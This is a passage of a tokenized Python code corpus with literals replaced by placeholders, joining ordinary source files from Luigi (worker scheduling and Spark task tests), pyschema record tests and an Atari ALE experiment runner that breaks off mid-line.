DEPENDENCY_DISCOVERED , task , d ) <EOL> yield d <EOL> deps = [ d . task_id for d in deps ] <EOL> self . _scheduled_tasks [ task . task_id ] = task <EOL> self . _add_task ( worker = self . _id , task_id = task . task_id , status = status , <EOL> deps = deps , runnable = runnable , priority = task . priority , <EOL> resources = task . process_resources ( ) , <EOL> params = task . to_str_params ( ) , <EOL> family = task . task_family , <EOL> module = task . task_module ) <EOL> def _validate_dependency ( self , dependency ) : <EOL> if isinstance ( dependency , Target ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> elif not isinstance ( dependency , Task ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> def _check_complete_value ( self , is_complete ) : <EOL> if is_complete not in ( True , False ) : <EOL> if isinstance ( is_complete , TracebackWrapper ) : <EOL> raise AsyncCompletionException ( is_complete . trace ) <EOL> raise Exception ( "<STR_LIT>" % is_complete ) <EOL> def _add_worker ( self ) : <EOL> self . _worker_info . append ( ( '<STR_LIT>' , self . _first_task ) ) <EOL> self . _scheduler . add_worker ( self . _id , self . _worker_info ) <EOL> def _log_remote_tasks ( self , running_tasks , n_pending_tasks , n_unique_pending ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> logger . debug ( "<STR_LIT>" ) <EOL> if running_tasks : <EOL> for r in running_tasks : <EOL> logger . debug ( '<STR_LIT>' , r [ '<STR_LIT>' ] , r [ '<STR_LIT>' ] ) <EOL> elif n_pending_tasks : <EOL> logger . debug ( "<STR_LIT>" , n_pending_tasks ) <EOL> if n_unique_pending : <EOL> logger . debug ( "<STR_LIT>" , n_unique_pending ) <EOL> def _get_work ( self ) : <EOL> if self . _stop_requesting_work : <EOL> return None , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> <EOL> logger . debug ( "<STR_LIT>" ) <EOL> r = self . _scheduler . get_work ( <EOL> worker = self . _id , <EOL> host = self . host , <EOL> assistant = self . _assistant , <EOL> current_tasks = list ( self . _running_tasks . keys ( ) ) , <EOL> ) <EOL> n_pending_tasks = r [ '<STR_LIT>' ] <EOL> task_id = r [ '<STR_LIT>' ] <EOL> running_tasks = r [ '<STR_LIT>' ] <EOL> n_unique_pending = r [ '<STR_LIT>' ] <EOL> self . _get_work_response_history . append ( dict ( <EOL> task_id = task_id , <EOL> running_tasks = running_tasks , <EOL> ) ) <EOL> if task_id is not None and task_id not in self . _scheduled_tasks : <EOL> logger . info ( '<STR_LIT>' , task_id ) <EOL> try : <EOL> self . _scheduled_tasks [ task_id ] = load_task ( module = r . get ( '<STR_LIT>' ) , <EOL> task_name = r [ '<STR_LIT>' ] , <EOL> params_str = r [ '<STR_LIT>' ] ) <EOL> except TaskClassException as ex : <EOL> msg = '<STR_LIT>' % task_id <EOL> logger . exception ( msg ) <EOL> subject = '<STR_LIT>' % msg <EOL> error_message = notifications . wrap_traceback ( ex ) <EOL> notifications . send_error_email ( subject , error_message ) <EOL> self . _add_task ( worker = self . _id , task_id = task_id , status = FAILED , runnable = False , <EOL> assistant = self . _assistant ) <EOL> task_id = None <EOL> self . run_succeeded = False <EOL> return task_id , running_tasks , n_pending_tasks , n_unique_pending <EOL> def _run_task ( self , task_id ) : <EOL> task = self . _scheduled_tasks [ task_id ] <EOL> p = self . _create_task_process ( task ) <EOL> self . _running_tasks [ task_id ] = p <EOL> if self . worker_processes > <NUM_LIT:1> : <EOL> with fork_lock : <EOL> p . start ( ) <EOL> else : <EOL> p . run ( ) <EOL> def _create_task_process ( self , task ) : <EOL> def update_tracking_url ( tracking_url ) : <EOL> self . _scheduler . add_task ( <EOL> task_id = task . task_id , <EOL> worker = self . _id , <EOL> status = RUNNING , <EOL> tracking_url = tracking_url , <EOL> ) <EOL> def update_status_message ( message ) : <EOL> self . _scheduler . set_task_status_message ( task . task_id , message ) <EOL> return TaskProcess ( <EOL> task , self . _id , self . _task_result_queue , update_tracking_url , update_status_message , <EOL> random_seed = bool ( self . worker_processes > <NUM_LIT:1> ) , <EOL> worker_timeout = self . _config . timeout <EOL> ) <EOL> def _purge_children ( self ) : <EOL> """<STR_LIT>""" <EOL> for task_id , p in six . iteritems ( self . _running_tasks ) : <EOL> if not p . is_alive ( ) and p . exitcode : <EOL> error_msg = '<STR_LIT>' % ( task_id , p . exitcode ) <EOL> elif p . timeout_time is not None and time . time ( ) > float ( p . timeout_time ) and p . is_alive ( ) : <EOL> p . terminate ( ) <EOL> error_msg = '<STR_LIT>' % task_id <EOL> else : <EOL> continue <EOL> logger . info ( error_msg ) <EOL> self . _task_result_queue . put ( ( task_id , FAILED , error_msg , [ ] , [ ] ) ) <EOL> def _handle_next_task ( self ) : <EOL> """<STR_LIT>""" <EOL> while True : <EOL> self . _purge_children ( ) <EOL> try : <EOL> task_id , status , expl , missing , new_requirements = ( <EOL> self . _task_result_queue . get ( <EOL> timeout = self . _config . wait_interval ) ) <EOL> except Queue . Empty : <EOL> return <EOL> task = self . _scheduled_tasks [ task_id ] <EOL> if not task or task_id not in self . _running_tasks : <EOL> continue <EOL> external_task_retryable = _is_external ( task ) and self . _config . retry_external_tasks <EOL> if status == FAILED and not external_task_retryable : <EOL> self . _email_task_failure ( task , expl ) <EOL> new_deps = [ ] <EOL> if new_requirements : <EOL> new_req = [ load_task ( module , name , params ) <EOL> for module , name , params in new_requirements ] <EOL> for t in new_req : <EOL> self . add ( t ) <EOL> new_deps = [ t . task_id for t in new_req ] <EOL> self . _add_task ( worker = self . _id , <EOL> task_id = task_id , <EOL> status = status , <EOL> expl = json . dumps ( expl ) , <EOL> resources = task . process_resources ( ) , <EOL> runnable = None , <EOL> params = task . to_str_params ( ) , <EOL> family = task . task_family , <EOL> module = task . task_module , <EOL> new_deps = new_deps , <EOL> assistant = self . _assistant ) <EOL> self . _running_tasks . pop ( task_id ) <EOL> if missing : <EOL> reschedule = True <EOL> for task_id in missing : <EOL> self . unfulfilled_counts [ task_id ] += <NUM_LIT:1> <EOL> if ( self . unfulfilled_counts [ task_id ] > <EOL> self . _config . max_reschedules ) : <EOL> reschedule = False <EOL> if reschedule : <EOL> self . add ( task ) <EOL> self . run_succeeded &= ( status == DONE ) or ( len ( new_deps ) > <NUM_LIT:0> ) <EOL> return <EOL> def _sleeper ( self ) : <EOL> while True : <EOL> jitter = self . _config . wait_jitter <EOL> wait_interval = self . _config . wait_interval + random . uniform ( <NUM_LIT:0> , jitter ) <EOL> logger . debug ( '<STR_LIT>' , wait_interval ) <EOL> time . sleep ( wait_interval ) <EOL> yield <EOL> def _keep_alive ( self , n_pending_tasks , n_unique_pending ) : <EOL> """<STR_LIT>""" <EOL> if not self . _config . keep_alive : <EOL> return False <EOL> elif self . _assistant : <EOL> return True <EOL> else : <EOL> return n_pending_tasks and ( n_unique_pending or not self . _config . count_uniques ) <EOL> def handle_interrupt ( self , signum , _ ) : <EOL> """<STR_LIT>""" <EOL> if signum == signal . SIGUSR1 : <EOL> self . _config . keep_alive = False <EOL> self . _stop_requesting_work = True <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' , self . worker_processes ) <EOL> sleeper = self . _sleeper ( ) <EOL> self . run_succeeded = True <EOL> self . _add_worker ( ) <EOL> while True : <EOL> while len ( self . _running_tasks ) >= self . worker_processes : <EOL> logger . debug ( '<STR_LIT>' , len ( self . _running_tasks ) ) <EOL> self . _handle_next_task ( ) <EOL> task_id , running_tasks , n_pending_tasks , n_unique_pending = self . _get_work ( ) <EOL> if task_id is None : <EOL> if not self . _stop_requesting_work : <EOL> self . _log_remote_tasks ( running_tasks , n_pending_tasks , n_unique_pending ) <EOL> if len ( self . _running_tasks ) == <NUM_LIT:0> : <EOL> if self . _keep_alive ( n_pending_tasks , n_unique_pending ) : <EOL> six . next ( sleeper ) <EOL> continue <EOL> else : <EOL> break <EOL> else : <EOL> self . _handle_next_task ( ) <EOL> continue <EOL> logger . debug ( "<STR_LIT>" , n_pending_tasks ) <EOL> self . _run_task ( task_id ) <EOL> while len ( self . _running_tasks ) : <EOL> logger . debug ( '<STR_LIT>' , len ( self . _running_tasks ) ) <EOL> self . _handle_next_task ( ) <EOL> return self . run_succeeded </s>
<s> from helpers import unittest <EOL> import os <EOL> import luigi <EOL> import luigi . contrib . hdfs <EOL> from luigi import six <EOL> from luigi . mock import MockTarget <EOL> from helpers import with_config <EOL> from luigi . contrib . external_program import ExternalProgramRunError <EOL> from luigi . contrib . spark import SparkSubmitTask , PySparkTask <EOL> from mock import patch , call , MagicMock <EOL> BytesIO = six . BytesIO <EOL> def poll_generator ( ) : <EOL> yield None <EOL> yield <NUM_LIT:1> <EOL> def setup_run_process ( proc ) : <EOL> poll_gen = poll_generator ( ) <EOL> proc . return_value . poll = lambda : next ( poll_gen ) <EOL> proc . return_value . returncode = <NUM_LIT:0> <EOL> proc . return_value . stdout = BytesIO ( ) <EOL> proc . return_value . stderr = BytesIO ( ) <EOL> class TestSparkSubmitTask ( SparkSubmitTask ) : <EOL> deploy_mode = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> entry_class = "<STR_LIT>" <EOL> jars = [ "<STR_LIT>" ] <EOL> py_files = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> files = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> conf = { "<STR_LIT>" : "<STR_LIT>" } <EOL> properties_file = "<STR_LIT>" <EOL> driver_memory = "<STR_LIT>" <EOL> driver_java_options = "<STR_LIT>" <EOL> driver_library_path = "<STR_LIT>" <EOL> driver_class_path = "<STR_LIT>" <EOL> executor_memory = "<STR_LIT>" <EOL> driver_cores = <NUM_LIT:8> <EOL> supervise = True <EOL> total_executor_cores = <NUM_LIT> <EOL> executor_cores = <NUM_LIT:10> <EOL> queue = "<STR_LIT>" <EOL> num_executors = <NUM_LIT:2> <EOL> archives = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> app = "<STR_LIT:file>" <EOL> def app_options ( self ) : <EOL> return [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def output ( self ) : <EOL> return luigi . LocalTarget ( '<STR_LIT>' ) <EOL> class TestDefaultSparkSubmitTask ( SparkSubmitTask ) : <EOL> app = '<STR_LIT>' <EOL> def output ( self ) : <EOL> return luigi . LocalTarget ( '<STR_LIT>' ) <EOL> class TestPySparkTask ( PySparkTask ) : <EOL> def input ( self ) : <EOL> return MockTarget ( '<STR_LIT:input>' ) <EOL> def output ( self ) : <EOL> return MockTarget ( '<STR_LIT>' ) <EOL> def main ( self , sc , * args ) : <EOL> sc . textFile ( self . input ( ) . path ) . saveAsTextFile ( self . output ( ) . path ) <EOL> class SparkSubmitTaskTest ( unittest . TestCase ) : <EOL> ss = '<STR_LIT>' <EOL> @ with_config ( { '<STR_LIT>' : { '<STR_LIT>' : ss , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:path>' } } ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_run ( self , proc ) : <EOL> setup_run_process ( proc ) <EOL> job = TestSparkSubmitTask ( ) <EOL> job . run ( ) <EOL> self . assertEqual ( proc . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:2>' , '<STR_LIT:file>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ with_config ( { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:path>' } } ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_environment_is_set_correctly ( self , proc ) : <EOL> setup_run_process ( proc ) <EOL> job = TestSparkSubmitTask ( ) <EOL> job . run ( ) <EOL> self . assertIn ( '<STR_LIT>' , proc . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( proc . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT:path>' ) <EOL> @ with_config ( { '<STR_LIT>' : { '<STR_LIT>' : ss , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_defaults ( self , proc ) : <EOL> proc . return_value . returncode = <NUM_LIT:0> <EOL> job = TestDefaultSparkSubmitTask ( ) <EOL> job . run ( ) <EOL> self . assertEqual ( proc . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_handle_failed_job ( self , proc , file , logger ) : <EOL> proc . return_value . returncode = <NUM_LIT:1> <EOL> file . return_value = BytesIO ( b'<STR_LIT>' ) <EOL> try : <EOL> job = TestSparkSubmitTask ( ) <EOL> job . run ( ) <EOL> except ExternalProgramRunError as e : <EOL> self . assertEqual ( e . err , '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , six . text_type ( e ) ) <EOL> self . assertIn ( call . info ( '<STR_LIT>' ) , <EOL> logger . mock_calls ) <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_dont_log_stderr_on_success ( self , proc , file , logger ) : <EOL> proc . return_value . returncode = <NUM_LIT:0> <EOL> file . return_value = BytesIO ( b'<STR_LIT>' ) <EOL> job = TestSparkSubmitTask ( ) <EOL> job . run ( ) <EOL> self . assertNotIn ( call . info ( <EOL> '<STR_LIT>' ) , <EOL> logger . mock_calls ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_app_must_be_set ( self , proc ) : <EOL> with self . assertRaises ( NotImplementedError ) : <EOL> job = SparkSubmitTask ( ) <EOL> job . run ( ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_app_interruption ( self , proc ) : <EOL> def interrupt ( ) : <EOL> raise KeyboardInterrupt ( ) <EOL> proc . return_value . wait = interrupt <EOL> try : <EOL> job = TestSparkSubmitTask ( ) <EOL> job . run ( ) <EOL> except KeyboardInterrupt : <EOL> pass <EOL> proc . return_value . kill . check_called ( ) <EOL> class PySparkTaskTest ( unittest . TestCase ) : <EOL> ss = '<STR_LIT>' <EOL> @ with_config ( { '<STR_LIT>' : { '<STR_LIT>' : ss , '<STR_LIT>' : "<STR_LIT>" } } ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_run ( self , proc ) : <EOL> setup_run_process ( proc ) <EOL> job = TestPySparkTask ( ) <EOL> job . run ( ) <EOL> proc_arg_list = proc . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( proc_arg_list [ <NUM_LIT:0> : <NUM_LIT:7> ] , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertTrue ( os . path . exists ( proc_arg_list [ <NUM_LIT:7> ] ) ) <EOL> self . assertTrue ( proc_arg_list [ <NUM_LIT:8> ] . endswith ( '<STR_LIT>' ) ) <EOL> @ with_config ( { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> @ patch . dict ( '<STR_LIT>' , { '<STR_LIT>' : MagicMock ( ) } ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_pyspark_runner ( self , spark_context ) : <EOL> sc = spark_context . return_value . __enter__ . return_value <EOL> def mock_spark_submit ( task ) : <EOL> from luigi . contrib . pyspark_runner import PySparkRunner <EOL> PySparkRunner ( * task . app_command ( ) [ <NUM_LIT:1> : ] ) . run ( ) <EOL> self . assertTrue ( os . path . exists ( sc . addPyFile . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) ) <EOL> with patch . object ( SparkSubmitTask , '<STR_LIT>' , mock_spark_submit ) : <EOL> job = TestPySparkTask ( ) <EOL> job . run ( ) <EOL> sc . textFile . assert_called_with ( '<STR_LIT:input>' ) <EOL> sc . textFile . return_value . saveAsTextFile . assert_called_with ( '<STR_LIT>' ) </s>
<s> import luigi <EOL> luigi . namespace ( "<STR_LIT>" ) <EOL> class Foo ( luigi . Task ) : <EOL> p = luigi . Parameter ( ) <EOL> class Bar ( Foo ) : <EOL> task_namespace = "<STR_LIT>" <EOL> luigi . namespace ( ) </s>
<s> import doctest <EOL> import pickle <EOL> from helpers import unittest <EOL> from datetime import datetime , timedelta <EOL> import luigi <EOL> import luigi . task <EOL> from luigi . task_register import load_task <EOL> class DummyTask ( luigi . Task ) : <EOL> param = luigi . Parameter ( ) <EOL> bool_param = luigi . BoolParameter ( ) <EOL> int_param = luigi . IntParameter ( ) <EOL> float_param = luigi . FloatParameter ( ) <EOL> date_param = luigi . DateParameter ( ) <EOL> datehour_param = luigi . DateHourParameter ( ) <EOL> timedelta_param = luigi . TimeDeltaParameter ( ) <EOL> insignificant_param = luigi . Parameter ( significant = False ) <EOL> class DefaultInsignificantParamTask ( luigi . Task ) : <EOL> insignificant_param = luigi . Parameter ( significant = False , default = '<STR_LIT:value>' ) <EOL> necessary_param = luigi . Parameter ( significant = False ) <EOL> class TaskTest ( unittest . TestCase ) : <EOL> def test_tasks_doctest ( self ) : <EOL> doctest . testmod ( luigi . task ) <EOL> def test_task_to_str_to_task ( self ) : <EOL> params = dict ( <EOL> param = '<STR_LIT:test>' , <EOL> bool_param = True , <EOL> int_param = <NUM_LIT> , <EOL> float_param = <NUM_LIT> , <EOL> date_param = datetime ( <NUM_LIT> , <NUM_LIT:9> , <NUM_LIT> ) . date ( ) , <EOL> datehour_param = datetime ( <NUM_LIT> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT:9> ) , <EOL> timedelta_param = timedelta ( <NUM_LIT> ) , <EOL> insignificant_param = '<STR_LIT:test>' ) <EOL> original = DummyTask ( ** params ) <EOL> other = DummyTask . from_str_params ( original . to_str_params ( ) ) <EOL> self . assertEqual ( original , other ) <EOL> def test_task_from_str_insignificant ( self ) : <EOL> params = { '<STR_LIT>' : '<STR_LIT>' } <EOL> original = DefaultInsignificantParamTask ( ** params ) <EOL> other = DefaultInsignificantParamTask . from_str_params ( params ) <EOL> self . assertEqual ( original , other ) <EOL> def test_task_missing_necessary_param ( self ) : <EOL> with self . assertRaises ( luigi . parameter . MissingParameterException ) : <EOL> DefaultInsignificantParamTask . from_str_params ( { } ) <EOL> def test_external_tasks_loadable ( self ) : <EOL> task = load_task ( "<STR_LIT>" , "<STR_LIT>" , { } ) <EOL> assert ( isinstance ( task , luigi . ExternalTask ) ) <EOL> def test_flatten ( self ) : <EOL> flatten = luigi . task . flatten <EOL> self . assertEqual ( sorted ( flatten ( { '<STR_LIT:a>' : '<STR_LIT:foo>' , '<STR_LIT:b>' : '<STR_LIT:bar>' } ) ) , [ '<STR_LIT:bar>' , '<STR_LIT:foo>' ] ) <EOL> self . assertEqual ( sorted ( flatten ( [ '<STR_LIT:foo>' , [ '<STR_LIT:bar>' , '<STR_LIT>' ] ] ) ) , [ '<STR_LIT:bar>' , '<STR_LIT:foo>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( flatten ( '<STR_LIT:foo>' ) , [ '<STR_LIT:foo>' ] ) <EOL> self . assertEqual ( flatten ( <NUM_LIT> ) , [ <NUM_LIT> ] ) <EOL> self . assertEqual ( flatten ( ( len ( i ) for i in [ "<STR_LIT:foo>" , "<STR_LIT>" ] ) ) , [ <NUM_LIT:3> , <NUM_LIT:5> ] ) <EOL> self . assertRaises ( TypeError , flatten , ( len ( i ) for i in [ "<STR_LIT:foo>" , "<STR_LIT>" , None ] ) ) <EOL> def test_externalized_task_picklable ( self ) : <EOL> task = luigi . task . externalize ( luigi . Task ( ) ) <EOL> pickled_task = pickle . dumps ( task ) <EOL> self . assertEqual ( task , pickle . loads ( pickled_task ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import warnings <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> DeprecationWarning , <EOL> stacklevel = <NUM_LIT:2> <EOL> ) <EOL> import pyschema_extensions . luigi <EOL> from pyschema_extensions . luigi import * </s>
<s> from unittest import TestCase <EOL> from pyschema import Record , dumps , loads , ispyschema , no_auto_store <EOL> from pyschema . types import * <EOL> import pyschema . core <EOL> class RevertDefinitionsTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . _original_schemas = pyschema . core . auto_store <EOL> pyschema . core . auto_store = self . _original_schemas . clone ( ) <EOL> def tearDown ( self ) : <EOL> pyschema . core . auto_store = self . _original_schemas <EOL> class TestNestedRecord ( RevertDefinitionsTest ) : <EOL> def test_full_circle ( self ) : <EOL> class Foo ( Record ) : <EOL> bin = Bytes ( ) <EOL> class MyRecord ( Record ) : <EOL> a_string = Text ( ) <EOL> a_float = Float ( ) <EOL> record = List ( SubRecord ( Foo ) ) <EOL> rec = MyRecord ( a_string = u"<STR_LIT>" ) <EOL> rec . record = [ Foo ( bin = "<STR_LIT:bar>" ) ] <EOL> s = dumps ( rec ) <EOL> reloaded_obj = loads ( s ) <EOL> self . assertEquals ( reloaded_obj . a_string , u"<STR_LIT>" ) <EOL> self . assertTrue ( reloaded_obj . a_float is None ) <EOL> self . assertTrue ( reloaded_obj . record [ <NUM_LIT:0> ] . bin , "<STR_LIT:bar>" ) <EOL> class TestBaseRecordNotInStore ( TestCase ) : <EOL> def test ( self ) : <EOL> self . assertTrue ( Record not in pyschema . core . auto_store ) <EOL> class TestBasicUsage ( TestCase ) : <EOL> def setUp ( self ) : <EOL> @ no_auto_store ( ) <EOL> class Foo ( Record ) : <EOL> t = Text ( ) <EOL> i = Integer ( ) <EOL> b = Boolean ( ) <EOL> def calculated ( self ) : <EOL> return self . t * <NUM_LIT:2> <EOL> self . Foo = Foo <EOL> def test_class_field ( self ) : <EOL> record = self . Foo ( t = u"<STR_LIT:foo>" ) <EOL> self . assertEquals ( record . t , u"<STR_LIT:foo>" ) <EOL> def test_post_declaration_field ( self ) : <EOL> record = self . Foo ( i = <NUM_LIT:10> ) <EOL> self . assertEquals ( record . i , <NUM_LIT:10> ) <EOL> def test_setattr_field ( self ) : <EOL> record = self . Foo ( ) <EOL> self . assertTrue ( record . b is None ) <EOL> record . b = False <EOL> self . assertFalse ( record . b ) <EOL> def test_forbidden_assignment ( self ) : <EOL> record = self . Foo ( ) <EOL> def forbidden_assignment ( ) : <EOL> record . c = "<STR_LIT>" <EOL> self . assertRaises ( <EOL> AttributeError , <EOL> forbidden_assignment <EOL> ) <EOL> def test_record_name ( self ) : <EOL> self . assertEquals ( <EOL> self . Foo . _schema_name , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_type_adherence ( self ) : <EOL> self . assertTrue ( ispyschema ( self . Foo ) ) <EOL> self . assertTrue ( issubclass ( self . Foo , Record ) ) <EOL> self . assertTrue ( isinstance ( self . Foo , pyschema . core . PySchema ) ) <EOL> def test_method ( self ) : <EOL> record = self . Foo ( t = u"<STR_LIT:a>" ) <EOL> calc = record . calculated ( ) <EOL> self . assertEquals ( calc , u"<STR_LIT>" ) <EOL> class TestRuntimeRecord ( TestBasicUsage ) : <EOL> def setUp ( self ) : <EOL> class Foo ( object ) : <EOL> t = Text ( ) <EOL> def calculated ( self ) : <EOL> return self . t * <NUM_LIT:2> <EOL> Foo . i = Integer ( ) <EOL> setattr ( Foo , "<STR_LIT:b>" , Boolean ( ) ) <EOL> self . Foo = pyschema . core . PySchema . from_class ( Foo , auto_store = False ) </s>
<s> def deserialize ( d , ** kw ) : <EOL> vert_section , edge_section = d . split ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> verts = [ line . split ( None , <NUM_LIT:1> ) for line in vert_section . split ( '<STR_LIT:\n>' ) if line ] <EOL> counts = { } <EOL> edges = [ ] <EOL> for line in edge_section . split ( '<STR_LIT:\n>' ) : <EOL> if line : <EOL> fm , to , label = ( line . split ( None , <NUM_LIT:2> ) + [ '<STR_LIT>' ] ) [ : <NUM_LIT:3> ] <EOL> c = counts . get ( label , <NUM_LIT:0> ) <EOL> counts [ label ] = c + <NUM_LIT:1> <EOL> id = "<STR_LIT>" % ( label , c ) if c else label <EOL> edges . append ( ( id , label , fm , to ) ) <EOL> return verts , edges </s>
<s> VERSION = "<STR_LIT>" <EOL> def version ( ) : <EOL> return VERSION </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import numpy as np <EOL> import cv2 <EOL> CROP_OFFSET = <NUM_LIT:8> <EOL> class ALEExperiment ( object ) : <EOL> def __init__ ( self , ale , agent , resized_width , resized_height , <EOL> resize_method , num_epochs , epoch_length , test_length , <EOL> frame_skip , death_ends_episode , max_start_nullops , rng ) : <EOL> self . ale = ale <EOL> self . agent = agent <EOL> self . num_epochs = num_epochs <EOL> self . epoch_length = epoch_length <EOL> self . test_length = test_length <EOL> self . frame_skip = frame_skip <EOL> self . death_ends_episode = death_ends_episode <EOL> self . min_action_set = ale . getMinimalActionSet ( ) <EOL> self . resized_width = resized_width <EOL> self . resized_height = resized_height <EOL> self . resize_method = resize_method <EOL> self . width , self . height = ale . getScreenDims ( ) <EOL> self . buffer_length = <NUM_LIT:2> <EOL> self . buffer_count = <NUM_LIT:0> <EOL> self . screen_buffer = np . empty ( ( self . buffer_length , <EOL> self . height , self . width ) , <EOL> dtype = np . uint8 ) <EOL> self . terminal_lol = False <EOL> self . max_start_nullops = max_start_nullops <EOL> self . rng = rng <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> for epoch in range ( <NUM_LIT:1> , self . num_epochs + <NUM_LIT:1> ) : <EOL> self . run_epoch ( epoch , self . epoch_length ) <EOL> self . agent . finish_epoch ( epoch ) <EOL> if self . test_length > <NUM_LIT:0> : <EOL> self . agent . start_testing ( ) <EOL> self . run_epoch ( epoch , self . test_length , True ) <EOL> self . agent . finish_testing ( epoch ) <EOL> def run_epoch ( self , epoch , num_steps , testing = False ) : <EOL> """<STR_LIT>""" <EOL> self . terminal_lol = False <EOL> steps_left = num_steps <EOL> while steps_left > <NUM_LIT:0> : <EOL> prefix = "<STR_LIT>" if testing else "<STR_LIT>" <EOL> logging . info ( prefix + "<STR_LIT>" + str ( epoch ) + "<STR_LIT>" + <EOL> str ( steps_left ) ) <EOL> _ , num_steps = self . run_episode ( steps_left , testing ) <EOL> steps_left -= num_steps <EOL> def _init_episode ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . terminal_lol or self . ale . game_over ( ) : <EOL> self . ale . reset_game ( ) <EOL> if self . max_start_nullops > <NUM_LIT:0> : <EOL> random_actions = self . rng . randint ( <NUM_LIT:0> , self . max_start_nullops + <NUM_LIT:1> ) <EOL> for _ in range ( random_actions ) : <EOL> self . _act ( <NUM_LIT:0> ) <EOL> self . _act ( <NUM_LIT:0> ) <EOL> self . _act ( <NUM_LIT:0> ) <EOL> def _act ( self , action ) : <EOL> """<STR_LIT>""" <EOL> reward = self . ale . act ( action ) <EOL> index = self . buffer_count % self . buffer_length <EOL> self . ale . getScreenGrayscale ( self . screen_buffer [ index , ... ] ) <EOL> self . buffer_count += <NUM_LIT:1> <EOL> return reward <EOL> def _step ( self , action ) : <EOL> """<STR_LIT>""" <EOL> reward = <NUM_LIT:0> <EOL> for _ in range ( self . frame_skip ) : <EOL> reward += self . _act ( action ) <EOL> return reward <EOL> def run_episode ( self , max_steps , testing ) : <EOL> """<STR_LIT>""" <EOL> self . _init_episode ( ) <EOL> start_lives = self . ale . lives ( ) <EOL> action = self . agent . start_episode ( self . get_observation ( ) ) <EOL> num_steps = <NUM_LIT:0> <EOL> while True : <EOL> reward = self . _step ( self . min_action_set [ action ] ) <EOL> self . terminal_lol = ( self . death_ends_episode and not testing and <EOL> self . ale . lives ( ) < start_lives ) <EOL> terminal = self . ale . game_over ( ) or self . terminal_lol <EOL> num_steps += <NUM_LIT:1> <EOL> if terminal or num_steps >= max_steps : <EOL> self . agent . end_episode ( reward , terminal ) <EOL> break <EOL> action = self . agent . step ( reward , self . get_observation ( ) ) <EOL> return terminal , num_steps <EOL> def get_observation ( self ) : <EOL> """<STR_LIT>""" <EOL> assert self . buffer_count >= <NUM_LIT:2> <EOL> index = self . buffer_count % self . buffer_length - <NUM_LIT:1> <EOL> max_image = np . maximum ( self . screen_buffer [ index , 